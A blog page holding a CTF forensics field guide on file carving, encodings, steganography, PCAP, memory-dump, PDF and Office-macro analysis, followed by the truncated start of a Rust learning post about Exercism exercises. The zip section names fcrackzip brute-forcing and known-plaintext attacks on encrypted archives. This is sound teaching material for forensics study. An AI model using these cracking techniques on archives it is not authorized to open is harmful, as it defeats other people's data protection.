19 Jun 2017, 21:49

CTF Forensics Field Guide

Note: this post was also submitted as a chapter to the CTF field guide.

Forensics

In a CTF context, “Forensics” challenges can include file format analysis, steganography, memory dump analysis, or network packet capture analysis. Any challenge to examine and process a hidden piece of information out of static data files (as opposed to executable programs or remote servers) could be considered a Forensics challenge (unless it involves cryptography, in which case it probably belongs in the Crypto category).

Forensics is a broad CTF category that does not map well to any particular job role in the security industry, although some challenges model the kinds of tasks seen in Incident Response (IR). Even in IR work, computer forensics is usually the domain of law enforcement seeking evidentiary data and attribution, rather than the commercial incident responder who may just be interested in expelling an attacker and/or restoring system integrity.

Unlike most CTF forensics challenges, a real-world computer forensics task would hardly ever involve unraveling a scheme of cleverly encoded bytes, hidden data, matryoshka-like files-within-files, or other such brain-teaser puzzles. One would typically not bust a criminal case by carefully reassembling a corrupted PNG file, revealing a photo of a QR code that decodes to a password for a zip archive containing an NES ROM that when played will output the confession. Rather, real-world forensics typically requires that a practitioner find indirect evidence of maliciousness: either the traces of an attacker on a system, or the traces of “insider threat” behavior. Real-world computer forensics is largely about knowing where to find incriminating clues in logs, in memory, in filesystems/registries, and associated file and filesystem metadata. Also, network (packet capture) forensics is more about metadata analysis than content analysis, as most network sessions are TLS-encrypted between endpoints now.

This disconnect between the somewhat artificial puzzle-game CTF “Forensics” and the way that forensics is actually done in the field might be why this category does not receive as much attention as the vulnerability-exploitation style challenges. It may also lack the “black hat attacker” appeal that draws many players to participate in CTFs. Regardless, many players enjoy the variety and novelty in CTF forensics challenges. It can also be a more beginner-friendly category, one where the playing field is level: there are no $5,000 professional tools like IDA Pro Ultimate Edition with Hex-Rays Decompiler to give some players a huge advantage over others, as is the case with executable analysis challenges.

Requisite Skills

For solving forensics CTF challenges, the three most useful abilities are probably:

  • Knowing a scripting language (e.g., Python)
  • Knowing how to manipulate binary data (byte-level manipulations) in that language
  • Recognizing formats, protocols, structures, and encodings

The first and second you can learn and practice outside of a CTF, but the third may only come from experience. Hopefully with this document, you can at least get a good head start.

And of course, like most CTF play, the ideal environment is a Linux system with – occasionally – Windows in a VM. MacOS is not a bad environment to substitute for Linux, if you can accept that some open-source tools may not install or compile correctly.

Manipulating Binary Data in Python

Assuming you have already picked up some Python programming, you still may not know how to effectively work with binary data. Low-level languages like C might be more naturally suited for this task, but Python’s many useful packages from the open-source community outweigh its learning curve for working with binary data.

Here are some examples of working with binary data in Python.

Writing or reading a file in binary mode:

f = open('Reverseit', "rb")
s = f.read()
f.close()
f = open('ItsReversed', "wb")
f.write(s[::-1])
f.close()

The bytearray type is a mutable sequence of bytes, and is available in both Python 2 and 3:

>>> s = bytearray(b"Hello World")
>>> for c in s: print(c)
...
72
101
108
108
111
32
87
111
114
108
100

You can also define a bytearray from a hexadecimal string representation:

>>> example2 = bytearray.fromhex(u'00 ff')
>>> example2
bytearray(b'\x00\xff')
>>> example2[1]
255

The bytearray type has most of the same convenient methods as a Python str or list: split(), insert(), reverse(), extend(), pop(), remove(), etc.

Reading a file into a bytearray for processing:

data = bytearray(open('challenge.png', 'rb').read())
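Once the data is in a bytearray, byte-level manipulation is straightforward. Here is a minimal sketch (the single-byte XOR key is a made-up value, and the offsets assume a PNG header, purely for illustration):

import struct

data = bytearray(open('challenge.png', 'rb').read())

# XOR every byte against a (hypothetical) one-byte key
xored = bytearray(b ^ 0x2a for b in data)

# Interpret bytes 16-24 as two big-endian 32-bit integers;
# in a PNG these are the IHDR width and height fields
width, height = struct.unpack('>II', bytes(data[16:24]))
print(width, height)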

Common Forensics Concepts and Tools

What follows is a high-level overview of some of the common concepts in forensics CTF challenges, and some recommended tools for performing common tasks.

File format identification (and “magic bytes”)

Almost every forensics challenge will involve a file, usually without any context that would give you a guess as to what the file is. Filetypes, as a concept for users, have historically been indicated with filetype extensions (e.g., readme.md for Markdown), MIME types (as on the web, with Content-Type headers), or with metadata stored in the filesystem (as with the mdls command in MacOS). In a CTF, part of the game is to identify the file ourselves, using a heuristic approach.

The traditional heuristic for identifying filetypes on UNIX is libmagic, which is a library for identifying so-called “magic numbers” or “magic bytes,” the unique identifying marker bytes in filetype headers. The libmagic library is the basis for the file command.

$ file screenshot.png 
screenshot.png: PNG image data, 1920 x 1080, 8-bit/color RGBA, non-interlaced

Keep in mind that heuristics, and tools that employ them, can be easily fooled. Because it is a CTF, you may be presented with a file that has been intentionally crafted to mislead file. Also, if a file contains another file embedded somewhere inside it, the file command is only going to identify the containing filetype. In scenarios such as these you may need to examine the file content more closely.
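One simple way of looking closer is to compare the file’s first bytes against known signatures yourself. A minimal sketch (the signature table is just a small sample, and the file name is a placeholder):

MAGIC = {
    b'\x89PNG\r\n\x1a\n': 'PNG',
    b'\xff\xd8\xff': 'JPEG',
    b'PK\x03\x04': 'ZIP (also OOXML, JAR, APK)',
    b'\x7fELF': 'ELF executable',
}

header = open('challenge.bin', 'rb').read(16)
for magic, name in MAGIC.items():
    if header.startswith(magic):
        print('Looks like', name)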

TrID is a more sophisticated version of file. Although it’s closed-source, it’s free and works across platforms. It also uses an identification heuristic, but with certainty percentages. Its advantage is its larger set of known filetypes that include a lot of proprietary and obscure formats seen in the real world.

File carving

Files-within-files is a common trope in forensics CTF challenges, and also in embedded systems’ firmware where primitive or flat filesystems are common. The term for identifying a file embedded in another file and extracting it is “file carving.” One of the best tools for this task is the firmware analysis tool binwalk.

scalpel, now a part of SleuthKit (discussed further under Filesystems), is another file-carving tool; it began as a rewrite of the older carving tool Foremost.

To manually extract a sub-section of a file (from a known offset to a known offset), you can use the dd command. Many hex-editors also offer the ability to copy bytes and paste them as a new file, so you don’t need to study the offsets.

Example of file-carving with dd from a file offset of 1335205 for a length of 40668937 bytes:

$ dd if=./file_with_a_file_in_it.xxx of=./extracted_file.xxx bs=1 skip=1335205 count=40668937

Although the above tools should suffice, in some cases you may need to programmatically extract a sub-section of a file using Python, using things like Python’s re or regex modules to identify magic bytes, and the zlib module to extract zlib streams.
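For example, here is a rough sketch of carving out zlib streams (0x78 0x9c is only the most common zlib header, so treat this as a starting point rather than a complete solution):

import re
import zlib

data = open('file_with_a_file_in_it.xxx', 'rb').read()

for match in re.finditer(b'\x78\x9c', data):
    offset = match.start()
    try:
        carved = zlib.decompressobj().decompress(data[offset:])
        open('carved_%08x.bin' % offset, 'wb').write(carved)
        print('zlib stream carved from offset', hex(offset))
    except zlib.error:
        pass  # false positive: not actually a zlib stream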

Initial analysis

At first you may not have any leads, and need to explore the challenge file at a high-level for a clue toward what to look at next. Some of the useful commands to know are strings to search for all plain-text strings in the file, grep to search for particular strings, bgrep to search for non-text data patterns, and hexdump.

Example of using strings to find ASCII strings, with file offsets:

$ strings -o screenshot.png
     12 IHDR
     36 $iCCPICC Profile
     88 U2EI4HB
...
     767787 IEND

Unicode strings, if they are encoded as UTF-8, might show up in the search for ASCII strings (at least their ASCII-range characters will). To search for other encodings, see the documentation for the -e flag. Beware the many encoding pitfalls of strings: some caution against its use in forensics at all, but for simple tasks it still has its place.

Example of searching for the PNG magic bytes in a PNG file:

$ bgrep 89504e47 screenshot.png 
screenshot.png: 00000000

Example of using hexdump:

$ hexdump -C screenshot.png | less
00000000  89 50 4e 47 0d 0a 1a 0a  00 00 00 0d 49 48 44 52  |.PNG........IHDR|
00000010  00 00 05 ca 00 00 02 88  08 06 00 00 00 40 3d c9  |.............@=.|
00000020  a4 00 00 18 24 69 43 43  50 49 43 43 20 50 72 6f  |....$iCCPICC Pro|
00000030  66 69 6c 65 00 00 58 85  95 79 09 38 55 5d f8 ef  |file..X..y.8U]..|
00000040  da 67 9f c9 71 0c c7 41  e6 79 9e 87 0c 99 e7 39  |.g..q..A.y.....9|
:

The advantage of hexdump is not that it is the best hex-editor (it’s not), but that you can pipe output of other commands directly into hexdump, and/or pipe its output to grep, or format its output using format strings.

Example of using hexdump format strings to output the first 50 bytes of a file as a series of 32-bit (4-byte) little-endian integers in hex:

$ hexdump -n 50 -e '"0x%08x "' screenshot.png
0x474e5089 0x0a1a0a0d 0x0d000000 0x52444849 0xca050000 0x88020000 0x00000608 0xc93d4000 0x180000a4 0x43436924 0x43434950 0x6f725020 0x00006966

The hexdump man page describes many other uses of the command.

Binary-as-text encodings

Binary is 1’s and 0’s, but often is transmitted as text. It would be wasteful to transmit actual sequences of 101010101, so the data is first encoded using one of a variety of methods. This is what is referred to as binary-to-text encoding, a popular trope in CTF challenges. When doing a strings analysis of a file as discussed above, you may uncover this binary data encoded as text strings.

We mentioned that to excel at forensics CTF challenges, it is important to be able to recognize encodings. Some can be identified at a glance, such as Base64 encoded content, identifiable by its alphanumeric charset and its “=” padding suffix (when present). There are many Base64 encoder/decoders online, or you can use the base64 command (the decode flag is -D on macOS, -d on GNU/Linux):

$ echo aGVsbG8gd29ybGQh | base64 -D
hello world!

ASCII-encoded hexadecimal is also identifiable by its charset (0-9, A-F). ASCII characters themselves occupy a certain range of bytes (0x00 through 0x7f, see man ascii), so if you are examining a file and find a string like 68 65 6c 6c 6f 20 77 6f 72 6c 64 21, it’s important to notice that most of these values fall within the ASCII range for lowercase letters (0x61 through 0x7a): this is ASCII text. Technically, it’s text (“hello world!”) encoded as ASCII (binary) encoded as hexadecimal (text again). Confused yet? 😉

There are several sites that provide online encoder-decoders for a variety of encodings. For a more local converter, try the xxd command.

Example of using xxd to do text-as-ascii-to-hex encoding:

$ echo hello world\! | xxd -p
68656c6c6f20776f726c64210a
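The same conversions are easy to script in Python, which helps when a challenge stacks several encodings on top of each other. A small sketch:

import base64
import binascii

print(base64.b64decode('aGVsbG8gd29ybGQh'))            # b'hello world!'
print(binascii.unhexlify('68656c6c6f20776f726c6421'))  # b'hello world!'
print(binascii.hexlify(b'hello world!'))               # b'68656c6c6f20776f726c6421'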

Common File formats

We’ve discussed the fundamental concepts and the tools for the more generic forensics tasks. Now, we’ll discuss more specific categories of forensics challenges, and the recommended tools for analyzing challenges in each category.

It would be impossible to prepare for every possible data format, but there are some that are especially popular in CTFs. If you were prepared with tools for analyzing the following, you would be prepared for the majority of Forensics challenges:

  • Archive files (ZIP, TGZ)
  • Image file formats (JPG, GIF, BMP, PNG)
  • Filesystem images (especially EXT4)
  • Packet captures (PCAP, PCAPNG)
  • Memory dumps
  • PDF
  • Video (especially MP4) or Audio (especially WAV, MP3)
  • Microsoft’s Office formats (RTF, OLE, OOXML)

Some of the harder CTF challenges pride themselves on requiring players to analyze an especially obscure format for which no publicly available tools exist. You will need to learn to quickly locate documentation and tools for unfamiliar formats. Many file formats are well-described in the public documentation you can find with a web search, but having some familiarity with the file format specifications will also help, so we include links to those here.

When analyzing file formats, a file-format-aware (a.k.a. templated) hex-editor like 010 Editor is invaluable. An open-source alternative has emerged called Kaitai Struct. Additionally, a lesser-known feature of the Wireshark network protocol analyzer is its ability to analyze certain media file formats like GIF, JPG, and PNG. All of these tools, however, are made to analyze non-corrupted and well-formatted files. Many CTF challenges task you with reconstructing a file based on missing or zeroed-out format fields, etc.

You also ought to check out the wonderful file-formats illustrated visually by Ange Albertini.

Archive files

Most CTF challenges are contained in a zip, 7z, rar, tar or tgz file, but only in a forensics challenge will the archive container file be a part of the challenge itself. Usually the goal here is to extract a file from a damaged archive, or find data embedded somewhere in an unused field (a common forensics challenge). Zip is the most common in the real world, and the most common in CTFs.

There are a handful of command-line tools for zip files that will be useful to know about.

  • unzip will often output helpful information on why a zip will not decompress.
  • zipdetails -v will provide in-depth information on the values present in the various fields of the format.
  • zipinfo lists information about the zip file’s contents, without extracting it.
  • zip -F input.zip --out output.zip and zip -FF input.zip --out output.zip attempt to repair a corrupted zip file.
  • fcrackzip brute-force guesses a zip password (for passwords <7 characters or so).
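For example, a typical fcrackzip brute-force run against short passwords looks something like this (-b for brute force, -u to verify candidate passwords with unzip, -l for the password-length range to try):

$ fcrackzip -b -u -l 1-6 challenge.zip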

The full Zip file format specification (PKWARE’s APPNOTE.TXT) is worth keeping at hand.

One important security-related note about password-protected zip files is that they do not encrypt the filenames and original file sizes of the compressed files they contain, unlike password-protected RAR or 7z files.

Another note about zip cracking is that if you have an unencrypted/uncompressed copy of any one of the files that is compressed in the encrypted zip, you can perform a “plaintext attack” and crack the zip, as detailed here, and explained in this paper. The newer scheme for password-protecting zip files (with AES-256, rather than “ZipCrypto”) does not have this weakness.

Image file format analysis

CTFs are supposed to be fun, and image files are good for containing hacker memes, so of course image files often appear in CTF challenges. Image file formats are complex and can be abused in many ways that make for interesting analysis puzzles involving metadata fields, lossy and lossless compression, checksums, steganography, or visual data encoding schemes.

The easy initial analysis step is to check an image file’s metadata fields with exiftool. If an image file has been abused for a CTF, its EXIF might identify the original image dimensions, camera type, embedded thumbnail image, comments and copyright strings, GPS location coordinates, etc. There might be a gold mine of metadata, or there might be almost nothing. It’s worth a look.

Example of exiftool output, truncated:

$ exiftool screenshot.png 
ExifTool Version Number         : 10.53
File Name                       : screenshot.png
Directory                       : .
File Size                       : 750 kB
File Modification Date/Time     : 2017:06:13 22:34:05-04:00
File Access Date/Time           : 2017:06:17 13:19:58-04:00
File Inode Change Date/Time     : 2017:06:13 22:34:05-04:00
File Permissions                : rw-r--r--
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 1482
Image Height                    : 648
Bit Depth                       : 8
Color Type                      : RGB with Alpha
Compression                     : Deflate/Inflate
...
Primary Platform                : Apple Computer Inc.
CMM Flags                       : Not Embedded, Independent
Device Manufacturer             : APPL
Device Model                    : 
...
Exif Image Width                : 1482
Exif Image Height               : 648
Image Size                      : 1482x648
Megapixels                      : 0.960

PNG files, in particular, are popular in CTF challenges, probably for their lossless compression suitable for hiding non-visual data in the image. PNG files can be dissected in Wireshark. To verify correctness or attempt to repair corrupted PNGs you can use pngcheck. If you need to dig into PNG a little deeper, the pngtools package might be useful.
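For example, pngcheck walks the chunk structure and reports the first length or CRC error it encounters, which usually points at exactly the field that was tampered with:

$ pngcheck -v screenshot.png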

Steganography, the practice of concealing some amount of secret data within an unrelated file that acts as its vessel (a.k.a. the “cover text”), is extraordinarily rare in the real world (made effectively obsolete by strong cryptography), but is another popular trope in CTF forensics challenges. Steganography could be implemented using any kind of data as the “cover text,” but media file formats are ideal because they tolerate a certain amount of unnoticeable data loss (the same characteristic that makes lossy compression schemes possible). The difficulty with steganography is that extracting the hidden message requires not only detecting that steganography has been used, but also identifying the exact steganographic tool used to embed it. Given a challenge file, if we suspect steganography, we must do at least a little guessing to check if it’s present. Stegsolve (JAR download link) is often used to apply various steganography techniques to image files in an attempt to detect and extract hidden data. You may also try zsteg.

Gimp provides the ability to alter various aspects of the visual data of an image file. CTF challenge authors have historically used altered Hue/Saturation/Luminance values or color channels to hide a secret message. Gimp is also good for confirming whether something really is an image file: for instance, when you believe you have recovered image data from a display buffer in a memory dump or elsewhere, but you lack the image file header that specifies pixel format, image height and width and so on. Open your mystery data as “raw image data” in Gimp and experiment with different settings.

The ImageMagick toolset can be incorporated into scripts and enable you to quickly identify, resize, crop, modify, convert, and otherwise manipulate image files. It can also find the visual and data difference between two seemingly identical images with its compare tool.

If you are writing a custom image file format parser, import the Python Imaging Library (PIL), a.k.a. Pillow. It enables you to extract frames from animated GIFs or even individual pixels from a JPG; it has native support for most major image file formats.
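A minimal sketch of the kind of thing Pillow makes easy (the file names are placeholders, and the pixel unpacking assumes an RGBA image):

from PIL import Image

img = Image.open('challenge.png')
print(img.format, img.size, img.mode)

pixels = img.load()
r, g, b, a = pixels[0, 0]    # inspect individual pixel values

# Dump each frame of an animated GIF to its own PNG
gif = Image.open('animation.gif')
for i in range(gif.n_frames):
    gif.seek(i)
    gif.convert('RGB').save('frame_%03d.png' % i)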

If working with QR codes (2D barcodes), also check out the qrtools module for Python. You can decode an image of a QR code with less than 5 lines of Python. Of course, if you just need to decode one QR code, any smartphone will do.

Filesystems analysis

Occasionally, a CTF forensics challenge consists of a full disk image, and the player needs to have a strategy for finding a needle (the flag) in this haystack of data. Triage, in computer forensics, refers to the ability to quickly narrow down what to look at. Without a strategy, the only option is looking at everything, which is time-prohibitive (not to mention exhausting).

Example of mounting a CD-ROM filesystem image:

mkdir /mnt/challenge
mount -t iso9660 challengefile /mnt/challenge

Once you have mounted the filesystem, the tree command is not bad for a quick look at the directory structure to see if anything sticks out to you for further analysis.

You may not be looking for a file in the visible filesystem at all, but rather a hidden volume, unallocated space (disk space that is not a part of any partition), a deleted file, or a non-file filesystem structure like an NTFS Alternate Data Stream (see http://www.nirsoft.net/utils/alternate_data_streams.html). For EXT3 and EXT4 filesystems, you can attempt to find deleted files with extundelete. For everything else, there’s TestDisk: recover missing partition tables, fix corrupted ones, undelete files on FAT or NTFS, etc.

The Sleuth Kit and its accompanying web-based user interface, “Autopsy,” is a powerful open-source toolkit for filesystem analysis. It’s a bit geared toward law-enforcement tasks, but can be helpful for tasks like searching for a keyword across the entire disk image, or looking at the unallocated space.

Embedded device filesystems are a unique category of their own. Made for fixed-function low-resource environments, they can be compressed, single-file, or read-only. Squashfs is one popular implementation of an embedded device filesystem. For images of embedded devices, you’re better off analyzing them with firmware-mod-kit or binwalk.

Packet Capture (PCAP) file analysis

Network traffic is captured and stored in a PCAP (packet capture) file by a program like tcpdump or Wireshark (both based on libpcap). A popular CTF challenge is to provide a PCAP file representing some network traffic and challenge the player to recover/reconstitute a transferred file or transmitted secret. Complicating matters, the packets of interest are usually in an ocean of unrelated traffic, so analysis triage and filtering the data is also a job for the player.

For initial analysis, take a high-level view of the packets with Wireshark’s statistics or conversations view, or its capinfos command. Wireshark, and its command-line version tshark, both support the concept of using “filters,” which, if you master the syntax, can quickly reduce the scope of your analysis. There is also an online service called PacketTotal where you can submit PCAP files up to 50MB, and graphically display some timelines of connections, and SSL metadata on the secure connections. Plus it will highlight file transfers and show you any “suspicious” activity. If you already know what you’re searching for, you can do grep-style searching through packets using ngrep.

Just as “file carving” refers to the identification and extraction of files embedded within files, “packet carving” is a term sometimes used to describe the extraction of files from a packet capture. There are expensive commercial tools for recovering files from captured packets, but one open-source alternative is the Xplico framework. Wireshark also has an “Export Objects” feature to extract data from the capture (e.g., File -> Export Objects -> HTTP -> Save all). Beyond that, you can try tcpxtract, Network Miner, Foremost, or Snort.

If you want to write your own scripts to process PCAP files directly, the dpkt Python package for pcap manipulation is recommended. You could also drive Wireshark from Python using Wirepy.
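A small dpkt sketch, assuming a classic PCAP (not PCAPNG) of Ethernet traffic, that prints the start of every TCP payload sent to port 80:

import dpkt

with open('capture.pcap', 'rb') as f:
    for timestamp, buf in dpkt.pcap.Reader(f):
        eth = dpkt.ethernet.Ethernet(buf)
        if not isinstance(eth.data, dpkt.ip.IP):
            continue
        tcp = eth.data.data
        if isinstance(tcp, dpkt.tcp.TCP) and tcp.dport == 80 and tcp.data:
            print(tcp.data[:60])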

If trying to repair a damaged PCAP file, there is an online service for repairing PCAP files called PCAPfix.

A note about PCAP vs PCAPNG: there are two versions of the PCAP file format; PCAPNG is newer and not supported by all tools. You may need to convert a file from PCAPNG to PCAP using Wireshark or another compatible tool, in order to work with it in some other tools.

Memory dump analysis

For years, computer forensics was synonymous with filesystem forensics, but as attackers became more sophisticated, they started to avoid the disk. Also, a snapshot of memory often contains context and clues that are impossible to find on disk because they only exist at runtime (operational configurations, remote-exploit shellcode, passwords and encryption keys, etc). So memory snapshot / memory dump forensics has become a popular practice in incident response. In a CTF, you might find a challenge that provides a memory dump image, and tasks you with locating and extracting a secret or a file from within it.

The premier open-source framework for memory dump analysis is Volatility. Volatility is a Python script for parsing memory dumps that were gathered with an external tool (or a VMware memory image gathered by pausing the VM). So, given the memory dump file and the relevant “profile” (the OS from which the dump was gathered), Volatility can start identifying the structures in the data: running processes, passwords, etc. It is also extensible using plugins for extracting various types of artifacts.
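A typical Volatility 2 session starts by letting it guess the profile and then running plugins against the dump (the file name and profile below are placeholders; depending on your installation the command may be vol.py rather than volatility):

$ volatility -f memory.dmp imageinfo
$ volatility -f memory.dmp --profile=Win7SP1x64 pslist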

Ethscan is made to find data in a memory dump that looks like network packets, and then extract it into a pcap file for viewing in Wireshark. There are plugins for extracting SQL databases, Chrome history, Firefox history and much more.

PDF file analysis

PDF is an extremely complicated document file format, with enough tricks and hiding places to write about for years. This also makes it popular for CTF forensics challenges. The NSA wrote a guide to these hiding places in 2008 titled “Hidden Data and Metadata in Adobe PDF Files: Publication Risks and Countermeasures.” It’s no longer available at its original URL, but you can find a copy here. Ange Albertini also keeps a wiki on GitHub of PDF file format tricks.

The PDF format is partially plain-text, like HTML, but with many binary “objects” in the contents. Didier Stevens has written good introductory material about the format. The binary objects can be compressed or even encrypted data, and can include active content such as JavaScript or Flash. To display the structure of a PDF, you can either browse it with a text editor, or open it with a PDF-aware file-format editor like Origami.

qpdf is one tool that can be useful for exploring a PDF and transforming or extracting information from it. Another is a framework in Ruby called Origami.
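For example, qpdf’s QDF mode rewrites a PDF into a normalized, mostly plain-text form that is much easier to read and edit in a text editor (file names here are placeholders):

$ qpdf --qdf --object-streams=disable challenge.pdf expanded.pdf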

When exploring PDF content for hidden data, some of the hiding places to check include:

  • non-visible layers
  • Adobe’s metadata format “XMP”
  • the “incremental update” feature of PDF, wherein a previous version of the document is retained but not visible to the user
  • white text on a white background
  • text behind images
  • an image behind an overlapping image
  • non-displayed comments

There are also several Python packages for working with the PDF file format, like PeepDF, that enable you to write your own parsing scripts.

Video and Audio file analysis

Like image file formats, audio and video file trickery is a common theme in CTF forensics challenges, not because hacking or data hiding ever happens this way in the real world, but just because audio and video are fun. As with image file formats, steganography might be used to embed a secret message in the content data, and again you should know to check the file metadata areas for clues. Your first step should be to take a look with the mediainfo tool (or exiftool) and identify the content type and look at its metadata.

Audacity is the premier open-source audio file and waveform-viewing tool, and CTF challenge authors love to encode text into audio waveforms, which you can see using the spectrogram view (although a specialized tool called Sonic Visualiser is better for this task in particular). Audacity can also enable you to slow down, reverse, and do other manipulations that might reveal a hidden message if you suspect there is one (if you can hear garbled audio, interference, or static). Sox is another useful command-line tool for converting and manipulating audio files.

It’s also common to check the least-significant bits (LSB) for a secret message. Most audio and video media formats use discrete (fixed-size) “chunks” so that they can be streamed; the least-significant bits of the sample data in those chunks are a common place to smuggle some data without noticeably affecting the file.
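As an illustration, here is a rough sketch that collects the least-significant bit of every byte of a WAV file’s sample data and packs them into bytes; real challenges vary in which samples, channels, and bit order they use:

import wave

w = wave.open('challenge.wav', 'rb')
samples = bytearray(w.readframes(w.getnframes()))
w.close()

bits = [b & 1 for b in samples]
message = bytearray()
for i in range(0, len(bits) - 7, 8):
    byte = 0
    for bit in bits[i:i + 8]:
        byte = (byte << 1) | bit
    message.append(byte)
print(bytes(message[:64]))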

Other times, a message might be encoded into the audio as DTMF tones or morse code. For these, try working with multimon-ng to decode them.

Video file formats are really container formats that hold separate streams of audio and video, multiplexed together for playback. For analyzing and manipulating video file formats, ffmpeg is recommended. ffmpeg -i gives initial analysis of the file content. It can also de-multiplex or play back the content streams. The power of ffmpeg is exposed to Python using ffmpy.

Office file analysis

Microsoft has created dozens of office document file formats, many of which are popular for the distribution of phishing attacks and malware because of their ability to include macros (VBA scripts). Microsoft Office document forensic analysis is not too different from PDF document forensics, and just as relevant to real-world incident response.

Broadly speaking, there are two generations of Office file format: the OLE formats (file extensions like RTF, DOC, XLS, PPT), and the “Office Open XML” formats (file extensions that include DOCX, XLSX, PPTX). Both generations are structured container formats that enable Linked or Embedded content (Objects). OOXML files are actually zip file containers (see the section above on archive files), meaning that one of the easiest ways to check for hidden data is to simply unzip the document:

$ unzip example.docx 
Archive:  example.docx
  inflating: [Content_Types].xml     
  inflating: _rels/.rels             
  inflating: word/_rels/document.xml.rels  
  inflating: word/document.xml       
  inflating: word/theme/theme1.xml   
 extracting: docProps/thumbnail.jpeg  
  inflating: word/comments.xml       
  inflating: word/settings.xml       
  inflating: word/fontTable.xml      
  inflating: word/styles.xml         
  inflating: word/stylesWithEffects.xml  
  inflating: docProps/app.xml        
  inflating: docProps/core.xml       
  inflating: word/webSettings.xml    
  inflating: word/numbering.xml
$ tree
.
├── [Content_Types].xml
├── _rels
├── docProps
│   ├── app.xml
│   ├── core.xml
│   └── thumbnail.jpeg
└── word
    ├── _rels
    │   └── document.xml.rels
    ├── comments.xml
    ├── document.xml
    ├── fontTable.xml
    ├── numbering.xml
    ├── settings.xml
    ├── styles.xml
    ├── stylesWithEffects.xml
    ├── theme
    │   └── theme1.xml
    └── webSettings.xml

As you can see, some of the structure is created by the file and folder hierarchy. The rest is specified inside the XML files. New Steganographic Techniques for the OOXML File Format, 2011 details some ideas for data hiding techniques, but CTF challenge authors will always be coming up with new ones.

Once again, a Python toolset exists for the examination and analysis of OLE and OOXML documents: oletools. For OOXML documents in particular, OfficeDissector is a very powerful analysis framework (and Python library). The latter includes a quick guide to its usage.

Sometimes the challenge is not to find hidden static data, but to analyze a VBA macro to determine its behavior. This is a more realistic scenario, and one that analysts in the field perform every day. The aforementioned dissector tools can indicate whether a macro is present, and probably extract it for you. A typical VBA macro in an Office document, on Windows, will download a PowerShell script to %TEMP% and attempt to execute it, in which case you now have a PowerShell script analysis task too. But malicious VBA macros are rarely complicated, since VBA is typically just used as a jumping-off platform to bootstrap code execution. In the case where you do need to understand a complicated VBA macro, or if the macro is obfuscated and has an unpacker routine, you don’t need to own a license to Microsoft Office to debug it. You can use LibreOffice: its interface will be familiar to anyone who has debugged a program; you can set breakpoints, create watch variables, and capture values after they have been unpacked but before whatever payload behavior has executed. You can even start a macro of a specific document from the command line:

$ soffice path/to/test.docx macro://./standard.module1.mymacro

20 Mar 2017, 22:56

A tour of Rust, Pt. 2

In my last post, I talked about what I think is the significance of the programming language Rust, and why I wanted to try learning it. Today, I take a look at Exercism.io (a sort-of social network for programming exercises) and its series of Rust challenges. These are definitely easy problems (so far); the focus is on learning how to solve them in a language that is new to you. We’ll see where I tripped up while trying to grasp some of the Rust language features, and some Rust I’ve learned so far.

Exercism.io Setup and Workflow

Assuming you also use MacOS with Homebrew, it’s just a couple of steps:

$ brew update && brew install exercism
$ exercism configure --key=YOUR_API_KEY
$ exercism configure --dir=~/Documents/Exercism

And then each new programming exercise is fetched this way:

$ exercism fetch rust		# will download the next exercise, "whatever"
$ cd ~/Documents/Exercism/whatever
$ mkdir src && touch src/lib.rs   # then, work on your solution in lib.rs

Each exercise asks you to write a Rust library that exports a function or two, such that you implement some behavior instructed in the README.md for that exercise. The folder structure provided is that of a Rust “crate”, which is what Rust (or rather, its build tool, Cargo) calls a source package. You will define a pub fn whatev() in src/lib.rs, which is the filename convention for a Rust library crate (as opposed to an executable crate, which would have a fn main() defined in a src/main.rs). Cargo.toml is the manifest file that defines the crate: the version string, the dependencies, and the author.

Each challenge comes with unit tests in tests/whatever.rs (technically, these are integration tests; Rust also allows you to write unit tests inline with the source files themselves). You can run the tests using Rust’s build tool, Cargo:

$ cargo test	# both compiles your library and runs the tests

If you just wanted to compile, you could run cargo build. Were this an executable crate rather than a library crate, you could also cargo run, but with a library crate run has no meaning, so we cargo test. Note: if you had noticed that the binaries are rather large, that is because Cargo builds debug binaries by default. For release, you would use cargo build --release.

Once all of the unit tests pass for an exercise, you can submit your solution like so:

$ exercism submit src/lib.rs

Rust Debugging in the VS Code editor

Although I discussed setting up a Rust development environment in the last post, Andrew Hobden has also documented the setup and use of other tools in the Rust development toolchain, and his writeup may be worth a look. For me right now, I don’t want the added headache of trying to work with any alpha or “nightly build” features of Rust. What was important for me was debugging in VS Code, so I appreciated his help with that. While I previously had no luck getting the “Native Debug” VS Code extension to work, using Andrew’s instructions, I did get the “LLDB Debugger” extension to work.

But do you need to manually recreate .vscode/launch.json and .vscode/tasks.json for every project you want to debug? That blows. Well, sort of. In VS Code you can click the debug icon in the sidebar and then the settings wheel icon in the debug pane that appears, and VS Code will create a mostly-complete launch.json file to which you just have to add:

"preLaunchTask": "cargo",
"sourceLanguages": ["rust"]

And of course, you’ll have to fix the final part of the path for “program” (your debug target). So there isn’t that much to do manually for each new project. But when you tell VS Code to run a “preLaunchTask”, as above, you then have to define that “task” in a .vscode/tasks.json file; it’s the same every time, so just copy and paste it from your last project. A hassle compared to debugging with a real IDE, but a minor hassle at least.

Exercism Exercises 1-10

1: Hello World, and strings in Rust

It looks like the developers of this challenge changed their answer format somewhere along the way during development, and now it actually contains conflicting instructions. Fortunately, this is the only challenge with this problem, but ignore the README.md this time as well as the GETTING_STARTED.md. As with most of these challenges, the most important file is tests/hello-world.rs which defines the Cargo unit tests and gives the guiding examples of what your code is supposed to produce. In this case, it is very simple, you just need to produce the string “Hello, World!” using a function called fn hello.

But what is the correct function declaration for fn hello? First, it has to be a function that is published by your Rust library for external callers, thus it is pub fn hello.

It is not taking any arguments (despite what the muddled instructions state), so it is pub fn hello().

And it returns a string, so it is…uh-oh. Here, Rust makes this harder than you might expect. There is the primitive type for representing strings, str, and then there is a String type (from the Rust standard library). They seem similar and completely redundant at first, but their purposes and usages are different in a variety of ways that will trip you up if you don’t understand what each one means. This duality of Strings and string literals is essential to understand, and it is poorly explained (if explained at all) in every Rust tutorial I’ve seen. If people need to write long posts explaining the difference, I think the language documentation could be doing a better job here.

Complicating matters, str is used synonymously in Rust documentation with “string” and “string literal”, and a reference to a subset of a String is an &str, a.k.a. “string slice”. In fact, a function that takes a &str can be passed a &String (a concept in Rust called coercion, i.e. implicit type conversion), but a function that takes a &String cannot be passed a &str. Wow. Confused yet? Just wait until you try to concatenate two strings. We’ll get to that later.

If you choose to use String, the return type is simple to understand, but you have to build a String instance out of a string literal using .to_string() or String::from, which is non-obvious:

pub fn hello() -> String {
  "Hello, World!".to_string()  // alternatively, String::from("Hello, World!")
}

If you choose instead to use str, the actual returned value needs nothing special, but the return type is by borrowed reference (hence the ampersand) and requires a lifetime specifier, something unique to Rust:

pub fn hello() -> &'static str {
    "Hello, World!"
}

